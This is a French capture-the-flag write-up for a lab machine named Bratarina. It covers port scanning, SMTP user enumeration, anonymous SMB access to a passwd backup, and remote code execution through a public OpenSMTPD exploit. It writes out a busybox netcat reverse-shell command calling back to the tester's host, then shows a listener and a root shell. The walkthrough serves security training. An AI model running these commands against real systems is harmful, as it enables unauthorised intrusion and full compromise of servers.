# Bratarina

`OpenSMTPD` `SMTP`

* Nom machine : Bratarina
* Difficulté : Facile
* OS : Linux

## Enumération

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 06:58 EDT
Nmap scan report for 192.168.194.71
Host is up (0.035s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT    STATE  SERVICE     VERSION
22/tcp  open   ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
|   256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
|_  256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
25/tcp  open   smtp        OpenSMTPD
| smtp-commands: bratarina Hello nmap.scanme.org [192.168.45.195], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
80/tcp  open   http        nginx 1.14.0 (Ubuntu)
|_http-title:         Page not found - FlaskBB        
|_http-server-header: nginx/1.14.0 (Ubuntu)
445/tcp open   netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: bratarina
|   NetBIOS computer name: BRATARINA\x00
|   Domain name: \x00
|   FQDN: bratarina
|_  System time: 2024-07-23T07:00:47-04:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 1h19m51s, deviation: 2h18m35s, median: -9s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-07-23T11:00:49
|_  start_date: N/A
```

### HTTP (80) : nginx 1.14.0

FlaskBB : rien d'intéressant

### SMTP (25)

```
┌──(kali㉿kali)-[~]
└─$ nmap --script smtp-enum-users 192.168.194.71 -p 25
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 07:10 EDT
Nmap scan report for auth (192.168.194.71)
Host is up (0.034s latency).

PORT   STATE SERVICE
25/tcp open  smtp
| smtp-enum-users: 
|_  root
```

Nous avons un user : root

Nous avons également trouvé un exploit pour openSMTPD :&#x20;

{% embed url="<https://www.exploit-db.com/exploits/47984>" %}

Nous y reviendrons plus tard.

### SMB (445)

```
┌──(kali㉿kali)-[~]
└─$ smbmap -H 192.168.194.71                               
[*] Detected 1 hosts serving SMB
                                                               [*] Established 1 SMB session(s)
                                   
[+] IP: 192.168.194.71:445	Name: auth                	Status: Authenticated
	Disk                                                  Permissions	Comment
	----                                                  -----------	-------
	backups                                           	READ ONLY	Share for backups
	IPC$                                              	NO ACCESS	IPC Service (Samba 4.7.6-Ubuntu)
```

```
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.194.71/backups              
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jul  6 03:46:41 2020
  ..                                  D        0  Mon Jul  6 03:46:41 2020
  passwd.bak                          N     1747  Mon Jul  6 03:46:41 2020

		10253588 blocks of size 1024. 6353552 blocks available
smb: \> get passwd.bak
getting file \passwd.bak of size 1747 as passwd.bak (13.2 KiloBytes/sec) (average 13.2 KiloBytes/sec)
```

```
┌──(kali㉿kali)-[~]
└─$ cat passwd.bak 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
neil:x:1000:1000:neil,,,:/home/neil:/bin/bash
_smtpd:x:1001:1001:SMTP Daemon:/var/empty:/sbin/nologin
_smtpq:x:1002:1002:SMTPD Queue:/var/empty:/sbin/nologin
postgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
```

Rien d'exploitable mais nous fourni des information sur la machine.

## Accès initial

### OpenSMTPD RCE

Nous revenons à l'exploit précédent : <https://www.exploit-db.com/exploits/47984>

```
┌──(kali㉿kali)-[~]
└─$ python exploit.py 192.168.194.71 25 "ping -c2 192.168.45.195"

┌──(kali㉿kali)-[~/exam/redis-rce]
└─$ sudo tcpdump -i tun0 icmp
[sudo] password for kali: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
08:13:21.217297 IP auth > 192.168.45.195: ICMP echo request, id 1934, seq 1, length 64
08:13:21.217342 IP 192.168.45.195 > auth: ICMP echo reply, id 1934, seq 1, length 64
08:13:22.219960 IP auth > 192.168.45.195: ICMP echo request, id 1934, seq 2, length 64
08:13:22.220003 IP 192.168.45.195 > auth: ICMP echo reply, id 1934, seq 2, length 64
```

Il fonctionne !

Nous avons un bon nombre de payload provenant de <https://www.revshells.com/>. Nous avons également essayé de créer un fichier contenant un reverse shell, mais non réusi à le télécharger sur la machine cible.

Nous avons obtenu un reverse shell en utilisant busybox. Au même moment, un listener netcat écoute sur le port 445.

```
┌──(kali㉿kali)-[~]
└─$ python exploit.py 192.168.194.71 25 "busybox nc 192.168.45.195 445 -e /bin/sh"
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 445 
listening on [any] 445 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.194.71] 36776
whoami
root
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@bratarina:~# cat /root/proof.txt
cat /root/proof.txt
```

Nous sommes root !